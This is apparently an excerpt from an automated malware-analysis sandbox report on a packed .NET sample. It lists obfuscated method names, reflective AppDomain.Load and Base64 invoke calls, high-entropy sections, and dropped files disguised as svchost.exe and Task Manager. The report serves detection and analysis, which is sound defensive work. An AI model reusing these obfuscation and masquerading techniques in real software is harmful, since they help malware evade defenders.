                        Source: Task Manager.exe.2.dr, dIQI3NYLguO.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{xEOhLr76BNB[2],DPEF9ZxDQwL.GRbqhF4b4tF(Convert.FromBase64String(xEOhLr76BNB[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                        Source: svchost.exe.0.dr, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: _39Q7vAgcOlnDUc9q41DbPZu6C8vOOn39uj7dSMPoLNvq9LfNQPCeUFq4cK4n6o2aDgjbt System.AppDomain.Load(byte[])
                        Source: svchost.exe.0.dr, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: KerdCCxFCvA System.AppDomain.Load(byte[])
                        Source: svchost.exe.0.dr, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: KerdCCxFCvA
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: _39Q7vAgcOlnDUc9q41DbPZu6C8vOOn39uj7dSMPoLNvq9LfNQPCeUFq4cK4n6o2aDgjbt System.AppDomain.Load(byte[])
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: KerdCCxFCvA System.AppDomain.Load(byte[])
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: KerdCCxFCvA
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: _39Q7vAgcOlnDUc9q41DbPZu6C8vOOn39uj7dSMPoLNvq9LfNQPCeUFq4cK4n6o2aDgjbt System.AppDomain.Load(byte[])
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: KerdCCxFCvA System.AppDomain.Load(byte[])
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs .Net Code: KerdCCxFCvA
                        Source: Task Manager.exe.2.dr, dIQI3NYLguO.cs .Net Code: oOOMGaeCsXN System.AppDomain.Load(byte[])
                        Source: Task Manager.exe.2.dr, dIQI3NYLguO.cs .Net Code: _7sdQawsEDgN System.AppDomain.Load(byte[])
                        Source: Task Manager.exe.2.dr, dIQI3NYLguO.cs .Net Code: _7sdQawsEDgN
                        Source: C:\Users\user\Desktop\dLRcE11Dkl.exe Code function: 0_2_00007FFD347A00BD pushad ; iretd 0_2_00007FFD347A00C1
                        Source: C:\Users\user\AppData\Roaming\All function.cmd Code function: 2_2_00007FFD347700BD pushad ; iretd 2_2_00007FFD347700C1
                        Source: C:\Users\user\AppData\Roaming\All function.exe Code function: 5_2_00007FFD347800BD pushad ; iretd 5_2_00007FFD347800C1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD3464D2A5 pushad ; iretd 8_2_00007FFD3464D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD34832316 push 8B485F95h; iretd 8_2_00007FFD3483231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD3468D2A5 pushad ; iretd 10_2_00007FFD3468D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD34872316 push 8B485F91h; iretd 10_2_00007FFD3487231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFD3467D2A5 pushad ; iretd 12_2_00007FFD3467D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFD34862316 push 8B485F92h; iretd 12_2_00007FFD3486231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FFD3466D2A5 pushad ; iretd 16_2_00007FFD3466D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FFD3478097D push E95A22D0h; ret 16_2_00007FFD347809C9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FFD3478C2C5 push ebx; iretd 16_2_00007FFD3478C2DA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_00007FFD34852316 push 8B485F93h; iretd 16_2_00007FFD3485231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD3465D2A5 pushad ; iretd 19_2_00007FFD3465D2A6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD348476F2 push eax; ret 19_2_00007FFD348476F3
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34840912 push eax; ret 19_2_00007FFD34840913
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34847512 push eax; ret 19_2_00007FFD34847513
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34842316 push 8B485F94h; iretd 19_2_00007FFD3484231B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD3484011A push eax; ret 19_2_00007FFD3484011B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34842D32 push eax; ret 19_2_00007FFD34842D33
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34840D59 push eax; ret 19_2_00007FFD34840D93
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34840542 push eax; ret 19_2_00007FFD34840543
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34840062 push eax; ret 19_2_00007FFD34840063
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34841292 push eax; ret 19_2_00007FFD34841293
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD348480BE push edx; ret 19_2_00007FFD348480D3
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34843A12 push eax; ret 19_2_00007FFD34843A13
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD3484001A push eax; ret 19_2_00007FFD3484001B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34840002 push eax; ret 19_2_00007FFD34840003
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34845425 push eax; ret 19_2_00007FFD3484543B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD34848A5A push eax; ret 19_2_00007FFD34848A5B
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_00007FFD3484225A push eax; ret 19_2_00007FFD3484225B
                        Source: dLRcE11Dkl.exe Static PE information: section name: .text entropy: 7.969273400624172
                        Source: All function.cmd.0.dr Static PE information: section name: .text entropy: 7.995521906741566
                        Source: dLRcE11Dkl.exe, Wigvk0CbYCVCKiwdQW7pvcTwDKYA740FwRxw5uTWiZdauz4qml.cs High entropy of concatenated method names: 'M9BHlu5LJtRCf1kNofXhvDiLOjGFLWYUaKOalsOwnCCUAepP7S', 'dnggex9uIaywBnMo9rUewUBai7sNT9h5mtmmeeqyfuINWJHRmW', 'lWzREqENw1J7hhTTP1M8SjDHvx32aSjhMFcemIyj4k5OjhEeyv', 'f95PQh9vQ74P3DWVnE30fMdFKPJWBfMw4rKbobHWxmTZXOYLRA', 'ml0Ks3eqMu8ItHP3aSryboH6EAiomvyA34Sb9XxUwOV4ijv0k9', 'YalRTB4iCEgjhN5JBg2tpZqRlNPO3gClsZ0PpQTLxCPmwDBZhc', '_1hFjBPenbWwKRqBqSRVsq7yLBsy8WV3ZgXfOrudOpsWMwtehle', 'WESRuSg4E3Uf2vyGCJRxGhQ3gY6sUFiRxvZapE2P58EzXnU6HE', 'utWa9gSlU06Qm7sbv4i8V6Tsy2ZtsRcZ0Zw5gDQsBXidzRQrcB', 'wOX6cBMcxb10iVN8Os2RrMJ1ESdgxQVyicloV1WpBZpkMWDoEf'
                        Source: dLRcE11Dkl.exe, 6FT7pE2wXqrYGPQa5MburPYyRmNPNPPwVDp1YBiWSFAnBDFvbQLd8xV9pUDrBUnRQ.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_8cdoYEV0nSaEV3a77d4peiLOfniaAJn9mYrZAVg0t01gkWc4bD', 'oB5hYg9aasO6ZLLU65yA6jffnyK5QsrFtDHthSmxTvIFOqowb6', 'KhAvRvlHWlN6PggG5e1NdFL2Fijtt8WfuO1Yiau3FsBlN0Qf9t', 'MHFd59bevbEUYfdVzZzqAEqTsd1AaKQbWvXn0P2rGPBAezspoc'
                        Source: svchost.exe.0.dr, H1K69lOkhiGBu3la6nan80U4LR1WK.cs High entropy of concatenated method names: '_0ylp6SRbhmKDpUb6I0Kqb33BN7GLg', 'e0Q6TObz1WeQKOYCdVxLLWSpEUYyd', 'nC48wPKArcmBP9kQVdn9XpDQwJFW2', 'fXgt3aLLu9xwgJ0a', 'bb8z3iAXrpos2HMM', 'RMFezPF540twUz7T', 'M9IczEPYs44QS6m2', 'nAEglIHWoMewuYtJ', '_7PzetYBuHoMdD08L', 'PbtyrzW9gViGzp9T'
                        Source: svchost.exe.0.dr, bwR3VWEWBCLSgcxWw04.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'C01Yw7zFklP1W3Wb0Qmut4yA', 'DU7GaDcIDccKilatvYi8rRTc', 'qYyk8VShLsjAjmNpNdNB1O7O', 'M5Hiff95zfiEOtqNcGb3tsVo'
                        Source: svchost.exe.0.dr, fW2WLGfmndzJprnieEtbylrfBwXbKwEvnMwuAsawnSCUWXBRij2.cs High entropy of concatenated method names: 'jmVFMo0RDrLrDStp2SDsqnphJEzaa6YQaFvxY3b7kIycCxGP0Fg', 'UvXq7CfcH0lgjlZXj5DQfy0nN7atXiFWGhL1zZKKds7DNrstXnS', '_8HS1YcDyslLlLdOvdFFuLVCMzrUCCvS1tYzMh6fZwFjNWu9Ctid', 'p3tjrY1jC7WXvMbdd0VkI8IGPIxpylb91RKKGr6YyccPds24yj3', 'ZuqEsiGetiCqUjcrS8c1r4WJe1JxX9pFBMuIZ48E0Yp5YBqimM6', 'XxEjoPP1kE2IbfDVWintgN1tHnZWXbNjdvNeVELhVGKleEIgq8T', 'CnnBlzFG633w5vomaVnA11VEWfS5I3qT9AWp8uExFqB29VTmjlozSsOXeuJXCy2U0lMGOb7SoLoBpAFq0Nl', '_5EHqDOA3f4vYXoHfWJHDlvC64NA0nB2P1j717fNXXaS6vAsWo1eUR2SSHTre99ePKC2fA3AnEzeUkCWEvKW', '_3mbOw3lfTSEh6hrCcGHSYMJfIMXoEVvedl609Q0D8iILldCOtFScmPKHncn1rti735TCvvGasyNaMtuJsTX', 'rYTj9wVJGd1IG5f5Z83BgJlf4C8xJXVSyZCBXzEadw97yNNppIDA6hrZg65B5iTuBdwIzVO222I9c9GC9OI'
                        Source: svchost.exe.0.dr, 5QxGXOnu1Vu.cs High entropy of concatenated method names: 'ZUmA9AKjBeO', 'rFKuEFdmCG6', '_4iD9k9dtpjW', 'xgOcwESPQvs', 'My9jWLAr2h9Ns1kx', 'u2tVS7jCkpLPkQni', 'YsctovZbYjVTkzHi', 'FlbIZZ0VdBuq6Pk1', 'aIPHhF7DhnPAUmc1', '_76WXB5wcdw36hZxp'
                        Source: svchost.exe.0.dr, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs High entropy of concatenated method names: '_3hjvAzXg774SaUtaKUczhVvSuFKy2GFfBHpYG6EQnxSAC2gbzt4AF9zG7fv7FBkv1o56M', '_39Q7vAgcOlnDUc9q41DbPZu6C8vOOn39uj7dSMPoLNvq9LfNQPCeUFq4cK4n6o2aDgjbt', 'RnJS3R7jeAvcA7EXetG0GVunx1tJoFMkrJyCNpaWQ9rFvt2VNk3okmR35Qmmt2PX2jLHp', 'Zr7uexCTfkC', 'QNwzYwVRo8E', '_7YNDsIAiIVd', 'UHYKkYvNKob', 'mUitWho72qX', 'TLSmuX2k5BT', 'Z7mB1QLXQuc'
                        Source: svchost.exe.0.dr, IAdtlBkckGw.cs High entropy of concatenated method names: 'jXJ8BklWaL8', 'MXXZjToIZhM', 'k7UjaOg1l9S', 'Z9be0Xy3nJi', '_0iG5j6gtCc3', '_8GlEDjNk4mC', 'EpdwBRxA7h1', 'WZXfRdzwArm', 'jHlwA1Sq4KV', 'P7GUgKDeDmnZ9aZMUsa89TZqxcojqkNrWAcxiFWcnbnX0aFsAvVok7bWLtKG2uFQxBTdYOERGApDW6Dpwc14Hc'
                        Source: svchost.exe.0.dr, 4CJBoxrumcU.cs High entropy of concatenated method names: 'VxTNNO1DouY', 'souyBaKgyRr6RJHPQNNG0VfI8gwfPV1IEkFHzbhbGqFljpVZndnQXG7clz2Rj1yEsbTkXrcR2', '_26RMn0yK7NPYQMFntjeMYQIDUUxJEJI5TRQWj9QmA9hcmI25KYRhPpPSvsFHpgajqbjiJbb37', 'gelsDLzd44KozKIWO9I9csnXPiTuGT5uEP8xF1O3NdnSg4VcLiCbyZQFhS6jK31gK22SUL3dM', 'Cx8Hg7bhyIBJXFji4bQT5tEBW6UhxOhijJDUvfq7htobXi2RW9rCiXqLHrT0juv7V3EYYWx33'
                        Source: svchost.exe.0.dr, taLg97lfy9j.cs High entropy of concatenated method names: 'KSryC3ndPZ3', 'PJZL9kM9l3m', '_7wyHeBtnYOJ', 'oqEaIUXiNd8', '_7TNi93bOAWr', 'J5fpmWy5gmD', 'oBuLgGKZJb0', 'blvxNrYhroK', 'FkQ7Iemi4Dx', '_9ik0w00Y9nd'
                        Source: svchost.exe.0.dr, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.cs High entropy of concatenated method names: 'oE4BLKkOJwJkhBs65QJpSDo8Md5CDAuZjc4WUEcxAfIOG23UBIaTCapleYZUKnLiMkbPMXxOI7PKPu2j9h3', 'N9oUI9mYXALciZoMZLlVV0tmvGYoUbkCuVuGZnI6tt3jqiR1CaAJvjbbU1vOTBGRVA80M0NW161PHQPFBWn', 'aUJok4hcYvsDPNQPmoAXSl6x3U0NEPPoLVH2cbndji0p9jfmIdDCSDse3HJZDg8oKnZJ3HFvPyo44QdL8Kw', 'R9VTw5Ow3ZrUixgXN4ty3GtrMHbKL0Qowe6VrLGgHXXnAQ80DTplv6LxWtYNmXENyTVP3JtltPNtVHkZXX3', 'j0zQrveLMiqSu7zMH9Our65UmlUYlqoBubCZOWDuamjeD6KqqAFMPJ95TCoWZLGCvyeeRlcP3hh59v4freS', '_8L5CgH0C23VRbMthP7Jf7kSrJ9glQcqMYhryJARUsflrpbpE4tjHVATY8vkfZcNwLTIzxmF6MNwHabAbKk0', 'zjteIiYZBCEUIfZALIIk3d7hDv65uKfuC8nAEC1T1CBPTBINCMoVJ4RLQAiyO7ZsVxkVDitgTfckEJSNLPx', 'cMcUuo0NeXcTC220n6asyoSddKOoINnXTXV9AqWmQcDlAwC8WzEdAqYNoZUoS745k2J4j', 'uxa5ikT1ZUIZdE6i6ERAWl1k81qclTsBai1NJ4agQeOPiM4PejGIEKTD5mIId5kNWkrjT', 'Y3bSF2JcUm79bs6HNJfk1SrdYfsj8C9B0hXA1iccUgOPOqUEtaRaOQKBDqT3LCBSy2tba'
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, H1K69lOkhiGBu3la6nan80U4LR1WK.cs High entropy of concatenated method names: '_0ylp6SRbhmKDpUb6I0Kqb33BN7GLg', 'e0Q6TObz1WeQKOYCdVxLLWSpEUYyd', 'nC48wPKArcmBP9kQVdn9XpDQwJFW2', 'fXgt3aLLu9xwgJ0a', 'bb8z3iAXrpos2HMM', 'RMFezPF540twUz7T', 'M9IczEPYs44QS6m2', 'nAEglIHWoMewuYtJ', '_7PzetYBuHoMdD08L', 'PbtyrzW9gViGzp9T'
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, bwR3VWEWBCLSgcxWw04.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'C01Yw7zFklP1W3Wb0Qmut4yA', 'DU7GaDcIDccKilatvYi8rRTc', 'qYyk8VShLsjAjmNpNdNB1O7O', 'M5Hiff95zfiEOtqNcGb3tsVo'
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, fW2WLGfmndzJprnieEtbylrfBwXbKwEvnMwuAsawnSCUWXBRij2.cs High entropy of concatenated method names: 'jmVFMo0RDrLrDStp2SDsqnphJEzaa6YQaFvxY3b7kIycCxGP0Fg', 'UvXq7CfcH0lgjlZXj5DQfy0nN7atXiFWGhL1zZKKds7DNrstXnS', '_8HS1YcDyslLlLdOvdFFuLVCMzrUCCvS1tYzMh6fZwFjNWu9Ctid', 'p3tjrY1jC7WXvMbdd0VkI8IGPIxpylb91RKKGr6YyccPds24yj3', 'ZuqEsiGetiCqUjcrS8c1r4WJe1JxX9pFBMuIZ48E0Yp5YBqimM6', 'XxEjoPP1kE2IbfDVWintgN1tHnZWXbNjdvNeVELhVGKleEIgq8T', 'CnnBlzFG633w5vomaVnA11VEWfS5I3qT9AWp8uExFqB29VTmjlozSsOXeuJXCy2U0lMGOb7SoLoBpAFq0Nl', '_5EHqDOA3f4vYXoHfWJHDlvC64NA0nB2P1j717fNXXaS6vAsWo1eUR2SSHTre99ePKC2fA3AnEzeUkCWEvKW', '_3mbOw3lfTSEh6hrCcGHSYMJfIMXoEVvedl609Q0D8iILldCOtFScmPKHncn1rti735TCvvGasyNaMtuJsTX', 'rYTj9wVJGd1IG5f5Z83BgJlf4C8xJXVSyZCBXzEadw97yNNppIDA6hrZg65B5iTuBdwIzVO222I9c9GC9OI'
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, 5QxGXOnu1Vu.cs High entropy of concatenated method names: 'ZUmA9AKjBeO', 'rFKuEFdmCG6', '_4iD9k9dtpjW', 'xgOcwESPQvs', 'My9jWLAr2h9Ns1kx', 'u2tVS7jCkpLPkQni', 'YsctovZbYjVTkzHi', 'FlbIZZ0VdBuq6Pk1', 'aIPHhF7DhnPAUmc1', '_76WXB5wcdw36hZxp'
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.cs High entropy of concatenated method names: '_3hjvAzXg774SaUtaKUczhVvSuFKy2GFfBHpYG6EQnxSAC2gbzt4AF9zG7fv7FBkv1o56M', '_39Q7vAgcOlnDUc9q41DbPZu6C8vOOn39uj7dSMPoLNvq9LfNQPCeUFq4cK4n6o2aDgjbt', 'RnJS3R7jeAvcA7EXetG0GVunx1tJoFMkrJyCNpaWQ9rFvt2VNk3okmR35Qmmt2PX2jLHp', 'Zr7uexCTfkC', 'QNwzYwVRo8E', '_7YNDsIAiIVd', 'UHYKkYvNKob', 'mUitWho72qX', 'TLSmuX2k5BT', 'Z7mB1QLXQuc'
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, IAdtlBkckGw.cs High entropy of concatenated method names: 'jXJ8BklWaL8', 'MXXZjToIZhM', 'k7UjaOg1l9S', 'Z9be0Xy3nJi', '_0iG5j6gtCc3', '_8GlEDjNk4mC', 'EpdwBRxA7h1', 'WZXfRdzwArm', 'jHlwA1Sq4KV', 'P7GUgKDeDmnZ9aZMUsa89TZqxcojqkNrWAcxiFWcnbnX0aFsAvVok7bWLtKG2uFQxBTdYOERGApDW6Dpwc14Hc'
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, 4CJBoxrumcU.cs High entropy of concatenated method names: 'VxTNNO1DouY', 'souyBaKgyRr6RJHPQNNG0VfI8gwfPV1IEkFHzbhbGqFljpVZndnQXG7clz2Rj1yEsbTkXrcR2', '_26RMn0yK7NPYQMFntjeMYQIDUUxJEJI5TRQWj9QmA9hcmI25KYRhPpPSvsFHpgajqbjiJbb37', 'gelsDLzd44KozKIWO9I9csnXPiTuGT5uEP8xF1O3NdnSg4VcLiCbyZQFhS6jK31gK22SUL3dM', 'Cx8Hg7bhyIBJXFji4bQT5tEBW6UhxOhijJDUvfq7htobXi2RW9rCiXqLHrT0juv7V3EYYWx33'
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, taLg97lfy9j.cs High entropy of concatenated method names: 'KSryC3ndPZ3', 'PJZL9kM9l3m', '_7wyHeBtnYOJ', 'oqEaIUXiNd8', '_7TNi93bOAWr', 'J5fpmWy5gmD', 'oBuLgGKZJb0', 'blvxNrYhroK', 'FkQ7Iemi4Dx', '_9ik0w00Y9nd'
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpack, WIS22rpCTM23jJqrCBO2GeNKAFtlACIAfJ5wlZx7QktbeLI2KL1kTAqyrsjfNgsYCdEj4gEJgJLLTR8zThK.cs High entropy of concatenated method names: 'oE4BLKkOJwJkhBs65QJpSDo8Md5CDAuZjc4WUEcxAfIOG23UBIaTCapleYZUKnLiMkbPMXxOI7PKPu2j9h3', 'N9oUI9mYXALciZoMZLlVV0tmvGYoUbkCuVuGZnI6tt3jqiR1CaAJvjbbU1vOTBGRVA80M0NW161PHQPFBWn', 'aUJok4hcYvsDPNQPmoAXSl6x3U0NEPPoLVH2cbndji0p9jfmIdDCSDse3HJZDg8oKnZJ3HFvPyo44QdL8Kw', 'R9VTw5Ow3ZrUixgXN4ty3GtrMHbKL0Qowe6VrLGgHXXnAQ80DTplv6LxWtYNmXENyTVP3JtltPNtVHkZXX3', 'j0zQrveLMiqSu7zMH9Our65UmlUYlqoBubCZOWDuamjeD6KqqAFMPJ95TCoWZLGCvyeeRlcP3hh59v4freS', '_8L5CgH0C23VRbMthP7Jf7kSrJ9glQcqMYhryJARUsflrpbpE4tjHVATY8vkfZcNwLTIzxmF6MNwHabAbKk0', 'zjteIiYZBCEUIfZALIIk3d7hDv65uKfuC8nAEC1T1CBPTBINCMoVJ4RLQAiyO7ZsVxkVDitgTfckEJSNLPx', 'cMcUuo0NeXcTC220n6asyoSddKOoINnXTXV9AqWmQcDlAwC8WzEdAqYNoZUoS745k2J4j', 'uxa5ikT1ZUIZdE6i6ERAWl1k81qclTsBai1NJ4agQeOPiM4PejGIEKTD5mIId5kNWkrjT', 'Y3bSF2JcUm79bs6HNJfk1SrdYfsj8C9B0hXA1iccUgOPOqUEtaRaOQKBDqT3LCBSy2tba'
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, H1K69lOkhiGBu3la6nan80U4LR1WK.csHigh entropy of concatenated method names: '_0ylp6SRbhmKDpUb6I0Kqb33BN7GLg', 'e0Q6TObz1WeQKOYCdVxLLWSpEUYyd', 'nC48wPKArcmBP9kQVdn9XpDQwJFW2', 'fXgt3aLLu9xwgJ0a', 'bb8z3iAXrpos2HMM', 'RMFezPF540twUz7T', 'M9IczEPYs44QS6m2', 'nAEglIHWoMewuYtJ', '_7PzetYBuHoMdD08L', 'PbtyrzW9gViGzp9T'
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, bwR3VWEWBCLSgcxWw04.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'C01Yw7zFklP1W3Wb0Qmut4yA', 'DU7GaDcIDccKilatvYi8rRTc', 'qYyk8VShLsjAjmNpNdNB1O7O', 'M5Hiff95zfiEOtqNcGb3tsVo'
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, fW2WLGfmndzJprnieEtbylrfBwXbKwEvnMwuAsawnSCUWXBRij2.csHigh entropy of concatenated method names: 'jmVFMo0RDrLrDStp2SDsqnphJEzaa6YQaFvxY3b7kIycCxGP0Fg', 'UvXq7CfcH0lgjlZXj5DQfy0nN7atXiFWGhL1zZKKds7DNrstXnS', '_8HS1YcDyslLlLdOvdFFuLVCMzrUCCvS1tYzMh6fZwFjNWu9Ctid', 'p3tjrY1jC7WXvMbdd0VkI8IGPIxpylb91RKKGr6YyccPds24yj3', 'ZuqEsiGetiCqUjcrS8c1r4WJe1JxX9pFBMuIZ48E0Yp5YBqimM6', 'XxEjoPP1kE2IbfDVWintgN1tHnZWXbNjdvNeVELhVGKleEIgq8T', 'CnnBlzFG633w5vomaVnA11VEWfS5I3qT9AWp8uExFqB29VTmjlozSsOXeuJXCy2U0lMGOb7SoLoBpAFq0Nl', '_5EHqDOA3f4vYXoHfWJHDlvC64NA0nB2P1j717fNXXaS6vAsWo1eUR2SSHTre99ePKC2fA3AnEzeUkCWEvKW', '_3mbOw3lfTSEh6hrCcGHSYMJfIMXoEVvedl609Q0D8iILldCOtFScmPKHncn1rti735TCvvGasyNaMtuJsTX', 'rYTj9wVJGd1IG5f5Z83BgJlf4C8xJXVSyZCBXzEadw97yNNppIDA6hrZg65B5iTuBdwIzVO222I9c9GC9OI'
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, 5QxGXOnu1Vu.csHigh entropy of concatenated method names: 'ZUmA9AKjBeO', 'rFKuEFdmCG6', '_4iD9k9dtpjW', 'xgOcwESPQvs', 'My9jWLAr2h9Ns1kx', 'u2tVS7jCkpLPkQni', 'YsctovZbYjVTkzHi', 'FlbIZZ0VdBuq6Pk1', 'aIPHhF7DhnPAUmc1', '_76WXB5wcdw36hZxp'
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, Kf3RwGMCHKoSpZUVVikz5YASiLSAXPTszyJQJJvFAe9hPYXsc2MhWw16NXPEnsD4qKBWV.csHigh entropy of concatenated method names: '_3hjvAzXg774SaUtaKUczhVvSuFKy2GFfBHpYG6EQnxSAC2gbzt4AF9zG7fv7FBkv1o56M', '_39Q7vAgcOlnDUc9q41DbPZu6C8vOOn39uj7dSMPoLNvq9LfNQPCeUFq4cK4n6o2aDgjbt', 'RnJS3R7jeAvcA7EXetG0GVunx1tJoFMkrJyCNpaWQ9rFvt2VNk3okmR35Qmmt2PX2jLHp', 'Zr7uexCTfkC', 'QNwzYwVRo8E', '_7YNDsIAiIVd', 'UHYKkYvNKob', 'mUitWho72qX', 'TLSmuX2k5BT', 'Z7mB1QLXQuc'
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, IAdtlBkckGw.csHigh entropy of concatenated method names: 'jXJ8BklWaL8', 'MXXZjToIZhM', 'k7UjaOg1l9S', 'Z9be0Xy3nJi', '_0iG5j6gtCc3', '_8GlEDjNk4mC', 'EpdwBRxA7h1', 'WZXfRdzwArm', 'jHlwA1Sq4KV', 'P7GUgKDeDmnZ9aZMUsa89TZqxcojqkNrWAcxiFWcnbnX0aFsAvVok7bWLtKG2uFQxBTdYOERGApDW6Dpwc14Hc'
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, 4CJBoxrumcU.csHigh entropy of concatenated method names: 'VxTNNO1DouY', 'souyBaKgyRr6RJHPQNNG0VfI8gwfPV1IEkFHzbhbGqFljpVZndnQXG7clz2Rj1yEsbTkXrcR2', '_26RMn0yK7NPYQMFntjeMYQIDUUxJEJI5TRQWj9QmA9hcmI25KYRhPpPSvsFHpgajqbjiJbb37', 'gelsDLzd44KozKIWO9I9csnXPiTuGT5uEP8xF1O3NdnSg4VcLiCbyZQFhS6jK31gK22SUL3dM', 'Cx8Hg7bhyIBJXFji4bQT5tEBW6UhxOhijJDUvfq7htobXi2RW9rCiXqLHrT0juv7V3EYYWx33'
                        Source: 0.2.dLRcE11Dkl.exe.28278a8.1.raw.unpack, taLg97lfy9j.csHigh entropy of concatenated method names: 'KSryC3ndPZ3', 'PJZL9kM9l3m', '_7wyHeBtnYOJ', 'oqEaIUXiNd8', '_7TNi93bOAWr', 'J5fpmWy5gmD', 'oBuLgGKZJb0', 'blvxNrYhroK', 'FkQ7Iemi4Dx', '_9ik0w00Y9nd'
